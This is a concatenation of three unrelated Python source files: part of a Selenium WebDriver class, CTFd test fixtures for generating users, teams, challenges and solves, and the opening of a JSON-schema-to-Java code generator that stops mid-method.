{'ms': float(time_to_wait) * 1000, 'type':'implicit'})
else:
self.execute(Command.IMPLICIT_WAIT, {'ms': float(time_to_wait) * 1000})
def set_script_timeout(self, time_to_wait):
"""
Set the amount of time that the script should wait during an
execute_async_script call before throwing an error.
:Args:
- time_to_wait: The amount of time to wait (in seconds)
:Usage:
driver.set_script_timeout(30)
"""
if self.w3c:
self.execute(Command.SET_TIMEOUTS,
{'ms': float(time_to_wait) * 1000, 'type':'script'})
else:
self.execute(Command.SET_SCRIPT_TIMEOUT,
{'ms': float(time_to_wait) * 1000})
def set_page_load_timeout(self, time_to_wait):
"""
Set the amount of time to wait for a page load to complete
before throwing an error.
:Args:
- time_to_wait: The amount of time to wait
:Usage:
driver.set_page_load_timeout(30)
"""
self.execute(Command.SET_TIMEOUTS,
{'ms': float(time_to_wait) * 1000, 'type':'page load'})
def find_element(self, by=By.ID, value=None):
"""
'Private' method used by the find_element_by_* methods.
:Usage:
Use the corresponding find_element_by_* instead of this.
:rtype: WebElement
"""
if not By.is_valid(by) or not isinstance(value, str):
raise InvalidSelectorException("Invalid locator values passed in")
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self.execute(Command.FIND_ELEMENT,
{'using': by, 'value': value})['value']
def find_elements(self, by=By.ID, value=None):
"""
'Private' method used by the find_elements_by_* methods.
:Usage:
Use the corresponding find_elements_by_* instead of this.
:rtype: list of WebElement
"""
if not By.is_valid(by) or not isinstance(value, str):
raise InvalidSelectorException("Invalid locator values passed in")
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self.execute(Command.FIND_ELEMENTS,
{'using': by, 'value': value})['value']
@property
def desired_capabilities(self):
"""
returns the drivers current desired capabilities being used
"""
return self.capabilities
def get_screenshot_as_file(self, filename):
"""
Gets the screenshot of the current window. Returns False if there is
any IOError, else returns True. Use full paths in your filename.
:Args:
- filename: The full path you wish to save your screenshot to.
:Usage:
driver.get_screenshot_as_file('/Screenshots/foo.png')
"""
png = self.get_screenshot_as_png()
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
finally:
del png
return True
save_screenshot = get_screenshot_as_file
def get_screenshot_as_png(self):
"""
Gets the screenshot of the current window as a binary data.
:Usage:
driver.get_screenshot_as_png()
"""
return base64.b64decode(self.get_screenshot_as_base64().encode('ascii'))
def get_screenshot_as_base64(self):
"""
Gets the screenshot of the current window as a base64 encoded string
which is useful in embedded images in HTML.
:Usage:
driver.get_screenshot_as_base64()
"""
return self.execute(Command.SCREENSHOT)['value']
def set_window_size(self, width, height, windowHandle='current'):
"""
Sets the width and height of the current window. (window.resizeTo)
:Args:
- width: the width in pixels to set the window to
- height: the height in pixels to set the window to
:Usage:
driver.set_window_size(800,600)
"""
command = Command.SET_WINDOW_SIZE
if self.w3c:
command = Command.W3C_SET_WINDOW_SIZE
self.execute(command, {'width': int(width), 'height': int(height),
'windowHandle': windowHandle})
def get_window_size(self, windowHandle='current'):
"""
Gets the width and height of the current window.
:Usage:
driver.get_window_size()
"""
command = Command.GET_WINDOW_SIZE
if self.w3c:
command = Command.W3C_GET_WINDOW_SIZE
size = self.execute(command,
{'windowHandle': windowHandle})
if size.get('value', None) != None:
return size['value']
else:
return size
def set_window_position(self, x, y, windowHandle='current'):
"""
Sets the x,y position of the current window. (window.moveTo)
:Args:
- x: the x-coordinate in pixels to set the window position
- y: the y-coordinate in pixels to set the window position
:Usage:
driver.set_window_position(0,0)
"""
self.execute(Command.SET_WINDOW_POSITION, {'x': int(x), 'y': int(y),
'windowHandle': windowHandle})
def get_window_position(self, windowHandle='current'):
"""
Gets the x,y position of the current window.
:Usage:
driver.get_window_position()
"""
return self.execute(Command.GET_WINDOW_POSITION,
{'windowHandle': windowHandle})['value']
@property
def file_detector(self):
return self._file_detector
@file_detector.setter
def file_detector(self, detector):
"""
Set the file detector to be used when sending keyboard input.
By default, this is set to a file detector that does nothing.
see FileDetector
see LocalFileDetector
see UselessFileDetector
:Args:
- detector: The detector to use. Must not be None.
"""
if detector == None:
raise WebDriverException("You may not set a file detector that is null")
if not isinstance(detector, FileDetector):
raise WebDriverException("Detector has to be instance of FileDetector")
self._file_detector = detector;
@property
def orientation(self):
"""
Gets the current orientation of the device
:Usage:
orientation = driver.orientation
"""
return self.execute(Command.GET_SCREEN_ORIENTATION)['value']
@orientation.setter
def orientation(self, value):
"""
Sets the current orientation of the device
:Args:
- value: orientation to set it to.
:Usage:
driver.orientation = 'landscape'
"""
allowed_values = ['LANDSCAPE', 'PORTRAIT']
if value.upper() in allowed_values:
self.execute(Command.SET_SCREEN_ORIENTATION, {'orientation': value})
else:
raise WebDriverException("You can only set the orientation to 'LANDSCAPE' and 'PORTRAIT'")
@property
def application_cache(self):
""" Returns a ApplicationCache Object to interact with the browser app cache"""
return ApplicationCache(self)
@property
def log_types(self):
"""
Gets a list of the available log types
:Usage:
driver.log_types
"""
return self.execute(Command.GET_AVAILABLE_LOG_TYPES)['value']
def get_log(self, log_type):
"""
Gets the log for a given log type
:Args:
- log_type: type of log that which will be returned
:Usage:
driver.get_log('browser')
driver.get_log('driver')
driver.get_log('client')
driver.get_log('server')
"""
return self.execute(Command.GET_LOG, {'type': log_type})['value']
|
|
import datetime
import gc
import random
import string
import uuid
from collections import namedtuple
from contextlib import contextmanager
from unittest.mock import Mock, patch
import requests
from flask.testing import FlaskClient
from freezegun import freeze_time
from sqlalchemy.engine.url import make_url
from sqlalchemy_utils import drop_database
from werkzeug.datastructures import Headers
from CTFd import create_app
from CTFd.cache import cache, clear_standings
from CTFd.config import TestingConfig
from CTFd.models import (
Awards,
ChallengeComments,
ChallengeFiles,
Challenges,
ChallengeTopics,
Comments,
Fails,
Fields,
Files,
Flags,
Hints,
Notifications,
PageComments,
PageFiles,
Pages,
Solves,
Tags,
TeamComments,
Teams,
Tokens,
Topics,
Tracking,
Unlocks,
UserComments,
Users,
)
from CTFd.utils import set_config
from tests.constants.time import FreezeTimes
text_type = str
binary_type = bytes
FakeRequest = namedtuple("FakeRequest", ["form"])
class CTFdTestClient(FlaskClient):
def open(self, *args, **kwargs):
if kwargs.get("json") is not None:
with self.session_transaction() as sess:
api_key_headers = Headers({"CSRF-Token": sess.get("nonce")})
headers = kwargs.pop("headers", Headers())
if isinstance(headers, dict):
headers = Headers(headers)
headers.extend(api_key_headers)
kwargs["headers"] = headers
return super(CTFdTestClient, self).open(*args, **kwargs)
class ctftime:
@contextmanager
def init():
"""
This context manager can be used to setup start and end dates for a test CTFd
"""
try:
set_config("start", FreezeTimes.START)
set_config("end", FreezeTimes.END)
yield
finally:
set_config("start", None)
set_config("end", None)
@contextmanager
def not_started():
"""
This context manager sets the current time to before the start date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.NOT_STARTED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
@contextmanager
def started():
"""
This context manager sets the current time to the start date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.STARTED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
@contextmanager
def ended():
"""
This context manager sets the current time to after the end date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.ENDED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
def create_ctfd(
ctf_name="CTFd",
ctf_description="CTF description",
name="admin",
email="[email protected]",
password="password",
user_mode="users",
setup=True,
enable_plugins=False,
application_root="/",
config=TestingConfig,
):
if enable_plugins:
config.SAFE_MODE = False
else:
config.SAFE_MODE = True
config.APPLICATION_ROOT = application_root
url = make_url(config.SQLALCHEMY_DATABASE_URI)
if url.database:
url.database = str(uuid.uuid4())
config.SQLALCHEMY_DATABASE_URI = str(url)
app = create_app(config)
app.test_client_class = CTFdTestClient
if setup:
app = setup_ctfd(
app,
ctf_name=ctf_name,
ctf_description=ctf_description,
name=name,
email=email,
password=password,
user_mode=user_mode,
)
return app
def setup_ctfd(
app,
ctf_name="CTFd",
ctf_description="CTF description",
name="admin",
email="[email protected]",
password="password",
user_mode="users",
):
with app.app_context():
with app.test_client() as client:
client.get("/setup") # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"ctf_description": ctf_description,
"name": name,
"email": email,
"password": password,
"user_mode": user_mode,
"nonce": sess.get("nonce"),
}
client.post("/setup", data=data)
return app
def destroy_ctfd(app):
with app.app_context():
gc.collect() # Garbage collect (necessary in the case of dataset freezes to clean database connections)
cache.clear()
drop_database(app.config["SQLALCHEMY_DATABASE_URI"])
def register_user(
app,
name="user",
email="[email protected]",
password="password",
raise_for_error=True,
):
with app.app_context():
with app.test_client() as client:
client.get("/register")
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
def register_team(app, name="team", password="password", raise_for_error=True):
with app.app_context():
with app.test_client() as client:
client.get("/team")
with client.session_transaction() as sess:
data = {"name": name, "password": password, "nonce": sess.get("nonce")}
r = client.post("/teams/new", data=data)
if raise_for_error:
assert r.status_code == 302
return client
def login_as_user(app, name="user", password="password", raise_for_error=True):
with app.app_context():
with app.test_client() as client:
client.get("/login")
with client.session_transaction() as sess:
data = {"name": name, "password": password, "nonce": sess.get("nonce")}
client.post("/login", data=data)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
return client
def login_with_mlc(
app,
name="user",
scope="profile%20team",
email="[email protected]",
oauth_id=1337,
team_name="TestTeam",
team_oauth_id=1234,
raise_for_error=True,
):
with app.test_client() as client, patch.object(
requests, "get"
) as fake_get_request, patch.object(requests, "post") as fake_post_request:
client.get("/login")
with client.session_transaction() as sess:
nonce = sess["nonce"]
redirect_url = "{endpoint}?response_type=code&client_id={client_id}&scope={scope}&state={state}".format(
endpoint=app.config["OAUTH_AUTHORIZATION_ENDPOINT"],
client_id=app.config["OAUTH_CLIENT_ID"],
scope=scope,
state=nonce,
)
r = client.get("/oauth", follow_redirects=False)
assert r.location == redirect_url
fake_post_response = Mock()
fake_post_request.return_value = fake_post_response
fake_post_response.status_code = 200
fake_post_response.json = lambda: {"access_token": "fake_mlc_access_token"}
fake_get_response = Mock()
fake_get_request.return_value = fake_get_response
fake_get_response.status_code = 200
fake_get_response.json = lambda: {
"id": oauth_id,
"name": name,
"email": email,
"team": {"id": team_oauth_id, "name": team_name},
}
client.get(
"/redirect?code={code}&state={state}".format(
code="mlc_test_code", state=nonce
),
follow_redirects=False,
)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
return client
def get_scores(user):
r = user.get("/api/v1/scoreboard")
scores = r.get_json()
return scores["data"]
def random_string(n=5):
return "".join(
random.choice(string.ascii_letters + string.digits) for _ in range(n)
)
def random_int(start=2147483647, stop=None, step=1):
return random.randrange(start, stop, step)
def gen_challenge(
db,
name="chal_name",
description="chal_description",
value=100,
category="chal_category",
type="standard",
state="visible",
**kwargs
):
chal = Challenges(
name=name,
description=description,
value=value,
category=category,
type=type,
state=state,
**kwargs
)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, user_id, team_id=None, name="award_name", value=100):
award = Awards(user_id=user_id, team_id=team_id, name=name, value=value)
award.date = datetime.datetime.utcnow()
db.session.add(award)
db.session.commit()
clear_standings()
return award
def gen_tag(db, challenge_id, value="tag_tag", **kwargs):
tag = Tags(challenge_id=challenge_id, value=value, **kwargs)
db.session.add(tag)
db.session.commit()
return tag
def gen_topic(db, challenge_id, value="topic", **kwargs):
topic = Topics(value=value, **kwargs)
db.session.add(topic)
db.session.commit()
challenge_topic = ChallengeTopics(challenge_id=challenge_id, topic_id=topic.id)
db.session.add(challenge_topic)
db.session.commit()
return challenge_topic
def gen_file(db, location, challenge_id=None, page_id=None):
if challenge_id:
f = ChallengeFiles(challenge_id=challenge_id, location=location)
elif page_id:
f = PageFiles(page_id=page_id, location=location)
else:
f = Files(location=location)
db.session.add(f)
db.session.commit()
return f
def gen_flag(db, challenge_id, content="flag", type="static", data=None, **kwargs):
flag = Flags(challenge_id=challenge_id, content=content, type=type, **kwargs)
if data:
flag.data = data
db.session.add(flag)
db.session.commit()
return flag
def gen_user(
db, name="user_name", email="[email protected]", password="password", **kwargs
):
user = Users(name=name, email=email, password=password, **kwargs)
db.session.add(user)
db.session.commit()
return user
def gen_team(
db,
name="team_name",
email="[email protected]",
password="password",
member_count=4,
**kwargs
):
team = Teams(name=name, email=email, password=password, **kwargs)
for i in range(member_count):
name = "user-{}-{}".format(random_string(), str(i))
user = gen_user(db, name=name, email=name + "@examplectf.com", team_id=team.id)
if i == 0:
team.captain_id = user.id
team.members.append(user)
db.session.add(team)
db.session.commit()
return team
def gen_hint(
db, challenge_id, content="This is a hint", cost=0, type="standard", **kwargs
):
hint = Hints(
challenge_id=challenge_id, content=content, cost=cost, type=type, **kwargs
)
db.session.add(hint)
db.session.commit()
return hint
def gen_unlock(db, user_id, team_id=None, target=None, type="hints"):
unlock = Unlocks(user_id=user_id, team_id=team_id, target=target, type=type)
db.session.add(unlock)
db.session.commit()
return unlock
def gen_solve(
db,
user_id,
team_id=None,
challenge_id=None,
ip="127.0.0.1",
provided="rightkey",
**kwargs
):
solve = Solves(
user_id=user_id,
team_id=team_id,
challenge_id=challenge_id,
ip=ip,
provided=provided,
**kwargs
)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
clear_standings()
return solve
def gen_fail(
db,
user_id,
team_id=None,
challenge_id=None,
ip="127.0.0.1",
provided="wrongkey",
**kwargs
):
fail = Fails(
user_id=user_id,
team_id=team_id,
challenge_id=challenge_id,
ip=ip,
provided=provided,
**kwargs
)
fail.date = datetime.datetime.utcnow()
db.session.add(fail)
db.session.commit()
return fail
def gen_tracking(db, user_id=None, ip="127.0.0.1", **kwargs):
tracking = Tracking(ip=ip, user_id=user_id, **kwargs)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, title, route, content, draft=False, auth_required=False, **kwargs):
page = Pages(
title=title,
route=route,
content=content,
draft=draft,
auth_required=auth_required,
**kwargs
)
db.session.add(page)
db.session.commit()
return page
def gen_notification(db, title="title", content="content"):
notif = Notifications(title=title, content=content)
db.session.add(notif)
db.session.commit()
def gen_token(db, type="user", user_id=None, expiration=None):
token = Tokens(type=type, user_id=user_id, expiration=expiration)
db.session.add(token)
db.session.commit()
return token
def gen_comment(db, content="comment", author_id=None, type="challenge", **kwargs):
if type == "challenge":
model = ChallengeComments
elif type == "user":
model = UserComments
elif type == "team":
model = TeamComments
elif type == "page":
model = PageComments
else:
model = Comments
comment = model(content=content, author_id=author_id, type=type, **kwargs)
db.session.add(comment)
db.session.commit()
return comment
def gen_field(
db,
name="CustomField",
type="user",
field_type="text",
description="CustomFieldDescription",
required=True,
public=True,
editable=True,
):
field = Fields(
name=name,
type=type,
field_type=field_type,
description=description,
required=required,
public=public,
editable=editable,
)
db.session.add(field)
db.session.commit()
return field
def simulate_user_activity(db, user):
gen_tracking(db, user_id=user.id)
gen_award(db, user_id=user.id)
challenge = gen_challenge(db)
flag = gen_flag(db, challenge_id=challenge.id)
hint = gen_hint(db, challenge_id=challenge.id)
for _ in range(5):
gen_fail(db, user_id=user.id, challenge_id=challenge.id)
gen_unlock(db, user_id=user.id, target=hint.id, type="hints")
gen_solve(db, user_id=user.id, challenge_id=challenge.id, provided=flag.content)
|
|
'''
The MIT License (MIT)
Copyright (c) 2013 SinnerSchrader Mobile GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
import datetime
import os
class JavaCodeGenerator:
naturalList = ["Object", "String", "double", "boolean", "Double", "Boolean"]
projectPrefix = ""
dirPath = ""
memberVariables = ""
isChild = False
isAbstract = False
def getCommonDescriptionString(self):
today = datetime.date.fromtimestamp(time.time())
commonDescription = "/*\n * Created by MetaJSONParser on " + today.strftime("%d.%m.%Y") + "."
commonDescription += "\n * Copyright (c) " + str(today.year) + " SinnerSchrader Mobile. All rights reserved.\n*/\n"
return commonDescription
def make(self, schemeObj):
self.makeInternal(schemeObj)
self.makeExtension(schemeObj)
return True
def makeInternal(self, schemeObj):
self.isAbstract = True
sourceString = ""
self.isChild = False;
print "starting: " + self.getClassName(schemeObj)
if len(self.dirPath) > 0:
sourceString += "package " + self.dirPath.replace("/", ".") + ".internal;\n\n"
sourceString += self.getCommonDescriptionString()
sourceString += self.getImports(schemeObj)
sourceString += self.getClassDefinition(schemeObj)
methodString = "";
self.memberVariables = ""
for prop in schemeObj.props:
methodString += self.getMethod(schemeObj, prop)
for variable in self.memberVariables.split("\n"):
if len(variable) > 0:
sourceString += self.indent(1) + variable + ";"
sourceString += "\n"
setterString = "";
getterString = "";
for variable in self.memberVariables.split("\n"):
setterString += self.createSetter(variable)
getterString += self.createGetter(variable)
sourceString += self.getConstructor(schemeObj)
sourceString += setterString
sourceString += getterString
# end class body
sourceString += "}\n"
if not os.path.exists(self.dirPath + "/internal"):
os.makedirs(self.dirPath + "/internal")
try:
sourceFile = open(self.dirPath + "/internal/" + self.getClassName(schemeObj) + ".java", "w")
sourceFile.write(sourceString) # Write a string to a file
finally:
sourceFile.close()
def makeExtension(self, schemeObj):
sourceString = ""
self.isChild = False;
self.isAbstract = False
print "extending: " + self.getClassName(schemeObj)
if len(self.dirPath) > 0:
sourceString += "package " + self.dirPath.replace("/", ".") + ";\n\n"
sourceString += self.getCommonDescriptionString()
sourceString += self.getImports(schemeObj)
sourceString += "import " + self.dirPath.replace("/", ".") + ".internal.Abstract" + self.getClassName(schemeObj) + ";\n"
sourceString += "\npublic class " + self.getClassName(schemeObj)
sourceString += " extends Abstract" + self.getClassName(schemeObj)
sourceString += " {\n"
sourceString += self.indent(1) + "public " + self.getClassName(schemeObj) + "(JSONObject json) throws JSONException {"
sourceString += self.indent(2) + "super(json);"
sourceString += self.indent(1) + "}\n"
# end class body
sourceString += "}\n"
try:
sourceFile = open(self.dirPath + "/" + self.getClassName(schemeObj) + ".java", "w")
sourceFile.write(sourceString) # Write a string to a file
finally:
sourceFile.close()
def getClassDefinition(self, schemeObj):
abstract = ""
classDef = "\npublic class " + self.getClassName(schemeObj)
if self.isAbstract is True:
abstract = "Abstract"
classDef = "\npublic abstract class " + self.getClassName(schemeObj)
if schemeObj.base_type != "object":
self.isChild = True
classDef += " extends " + abstract + self.projectPrefix + self.cap(schemeObj.base_type)
classDef += " {\n"
return classDef
def getMethod(self, schemeObj, prop=None):
source = ""
if len(prop.getBaseTypes()) == 0:
# only one base type
source += self.getMethodForBaseType(schemeObj, prop, prop.base_type)
else:
# multiple base types
for baseType in prop.getBaseTypes():
if schemeObj.hasScheme(baseType):
baseTypeScheme = schemeObj.getScheme(baseType)
objectName = self.convertToJavaType(baseTypeScheme.type_name)
className = self.projectPrefix + self.cap(self.convertToJavaType(baseTypeScheme.type_name))
if len(baseTypeScheme.getBaseTypes()) == 0:
if self.convertToJavaType(baseTypeScheme.base_type) == "array":
for subType in baseTypeScheme.sub_type:
className = self.cap(subType)
projectPrefix = ""
if schemeObj.hasScheme(subType) and len(schemeObj.getScheme(subType).props) > 0:
projectPrefix = self.projectPrefix
self.addOrIgnoreMemberVariable("private", "ArrayList<" + projectPrefix + className + ">", self.getVariableName(prop.type_name) + "As" + className)
if prop.required is True:
source += self.indent(2) + "final JSONArray " + self.getVariableName(prop.type_name) + "As" + className + "Array = json.getJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
else:
extraIndent = " "
source += self.indent(2) + "final JSONArray " + self.getVariableName(prop.type_name) + "As" + className + "Array = json.optJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "As" + className + "Array == null) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + "As" + className + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(2) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + " = new ArrayList<" + projectPrefix + className + ">(" + self.getVariableName(prop.type_name) + "As" + className + "Array.length());"
source += self.indent(2) + extraIndent + "for (int i = 0; i < " + self.getVariableName(prop.type_name) + "As" + className + "Array.length(); i++) {"
if self.isNatural(className):
source += self.indent(3) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + ".add(" + self.getVariableName(prop.type_name) + "As" + className + "Array.get" + className + "(i));"
else:
source += self.indent(3) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + ".add(new " + projectPrefix + className + "(" + self.getVariableName(prop.type_name) + "As" + className + "Array.getJSONObject(i)));"
source += self.indent(2) + extraIndent + "}"
source += self.indent(2) + "}"
return source
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(objectName)
self.addOrIgnoreMemberVariable("private", self.cap(className), variableName)
getType = "opt"
if prop.required is True:
getType = "get"
if self.isNatural(className):
source += self.getSchemeLimitationBody(schemeObj, baseTypeScheme)
else:
source += self.indent(2) + variableName + " = new " + self.projectPrefix + self.cap(self.convertToJavaType(baseTypeScheme.type_name)) + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
asString = ""
if self.convertToJavaType(baseTypeScheme.base_type) == "multi":
asString = "As" + className
projectPrefix = ""
if baseTypeScheme.isNaturalType() is False:
projectPrefix = self.projectPrefix
self.addOrIgnoreMemberVariable("private", projectPrefix + className, self.getVariableName(prop.type_name) + asString)
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new " + projectPrefix + className + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
source += self.indent(2) + "final JSONObject " + self.getVariableName(prop.type_name) + "JsonObject = json.optJSONObject(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "JsonObject == null) {"
source += self.indent(3) + "return null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new " + projectPrefix + className + "(" + self.getVariableName(prop.type_name) + "JsonObject);"
source += self.indent(2) + "}"
else:
className = self.convertToJavaType(baseType)
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(className)
if self.low(className) == "byte":
self.addOrIgnoreMemberVariable("private", "byte[]", variableName)
else:
self.addOrIgnoreMemberVariable("private", self.cap(className), variableName)
getType = "opt"
if prop.required is True:
getType = "get"
if self.isNatural(baseType):
source += self.indent(2) + variableName + " = json." + getType + self.cap(className) + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
if self.low(className) == "date":
source += self.indent(2) + variableName + " = new Date(json." + getType + "Long(\"" + self.getVariableName(prop.type_name) + "\"));"
elif self.low(className) == "byte":
source += self.indent(2) + variableName + " = json." + getType + "String(\"" + self.getVariableName(prop.type_name) + "\").getBytes();"
else:
source += self.indent(2) + variableName + " = json." + getType + self.cap(className) + "(\"" + self.getVariableName(prop.type_name) + "\");"
return source
def getSchemeLimitationBody(self, schemeObj, prop):
className = self.convertToJavaType(prop.base_type)
varName = self.getVariableName(prop.type_name)
source = self.indent(2) + varName + " = json.get" + className + "(\"" + varName + "\");"
if prop.base_type == "array":
if prop.hasMaxCount:
source += self.indent(2) + "if (" + varName + ".length < " + str(prop.minCount) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be less than " + str(prop.minCount) + "\");"
source += self.indent(2) + "}"
if prop.hasMaxCount:
source += self.indent(2) + "if (" + varName + ".length > " + str(prop.maxCount) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be bigger than " + str(prop.maxCount) + "\");"
source += self.indent(2) + "}"
if prop.hasMinLength:
source += self.indent(2) + "if (" + varName + ".length() < " + str(prop.minLength) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be shorter than " + str(prop.minLength) + "\");"
source += self.indent(2) + "}"
if prop.hasMaxLength:
source += self.indent(2) + "if (" + varName + ".length() > " + str(prop.maxLength) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be longer than " + str(prop.maxLength) + "\");"
source += self.indent(2) + "}"
if prop.regex:
source += self.indent(2) + "if (!Pattern.compile(\"" + prop.regex + "\").matcher(" + varName + ").matches()) {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " doesn't fit regex " + prop.regex + "\");"
source += self.indent(2) + "}"
source += self.indent(2) + "return " + varName + ";"
return source
def getMethodForBaseType(self, schemeObj, prop, typeName):
source = ""
baseType = typeName
typeClassName = self.cap(self.convertToJavaType(typeName))
if baseType == "array":
for subType in prop.sub_type:
objectName = self.convertToJavaType(subType)
className = self.cap(objectName)
projectPrefix = ""
if schemeObj.hasScheme(subType) and len(schemeObj.getScheme(subType).props) > 0:
projectPrefix = self.projectPrefix
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(subType)
self.addOrIgnoreMemberVariable("private", "ArrayList<" + projectPrefix + className + ">", variableName)
extraIndent = ""
if prop.required is True:
source += self.indent(2) + "final JSONArray " + variableName + "Array = json.getJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
else:
extraIndent = " "
source += self.indent(2) + "final JSONArray " + variableName + "Array = json.optJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + variableName + "Array == null) {"
source += self.indent(3) + variableName + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(2) + extraIndent + variableName + " = new ArrayList<" + projectPrefix + className + ">(" + variableName + "Array.length());"
source += self.indent(2) + extraIndent + "for (int i = 0; i < " + variableName + "Array.length(); i++) {"
if self.isNatural(className):
if className == "Object":
className = ""
source += self.indent(3) + extraIndent + variableName + ".add(" + variableName + "Array.get" + className + "(i));"
else:
source += self.indent(3) + extraIndent + variableName + ".add(new " + projectPrefix + className + "(" + variableName + "Array.getJSONObject(i)));"
source += self.indent(2) + extraIndent + "}"
source += self.indent(2) + "}"
elif baseType == "date":
self.addOrIgnoreMemberVariable("private", self.cap(self.convertToJavaType(prop.rootBaseType())), self.getVariableName(prop.type_name))
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new Date(json.getInt(\"" + self.getVariableName(prop.type_name) + "\") / 1000);"
else:
source += self.indent(2) + "final int " + self.getVariableName(prop.type_name) + "Timestamp = json.optInt(\"" + self.getVariableName(prop.type_name) + "\", -1);"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "Timestamp == -1) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new Date(" + self.getVariableName(prop.type_name) + "Timestamp / 1000);"
source += self.indent(2) + "}"
else:
if self.isNatural(prop.rootBaseType()) is True:
self.addOrIgnoreMemberVariable("private", self.cap(self.convertToJavaType(prop.rootBaseType())), self.getVariableName(prop.type_name))
getMethod = typeClassName
if getMethod == "Object":
getMethod = "" # reset as the getter for Object is just json.get()
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.get" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
if len(getMethod) == 0:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.opt" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.opt" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\", " + str(self.getDefaultValue(typeClassName)) + ");"
else:
self.addOrIgnoreMemberVariable("private", self.projectPrefix + self.cap(typeName), self.getVariableName(prop.type_name))
typeName = self.convertToJavaType(prop.base_type);
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new " + self.projectPrefix + self.cap(typeName) + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
source += self.indent(2) + "final JSONObject " + self.getVariableName(prop.type_name) + "Json = json.optJSONObject(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "Json == null) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new " + self.projectPrefix + self.cap(typeName) + "(" + self.getVariableName(prop.type_name) + "Json);"
source += self.indent(2) + "}"
return source
def getImports(self, schemeObj):
source = "\nimport org.json.JSONObject;"
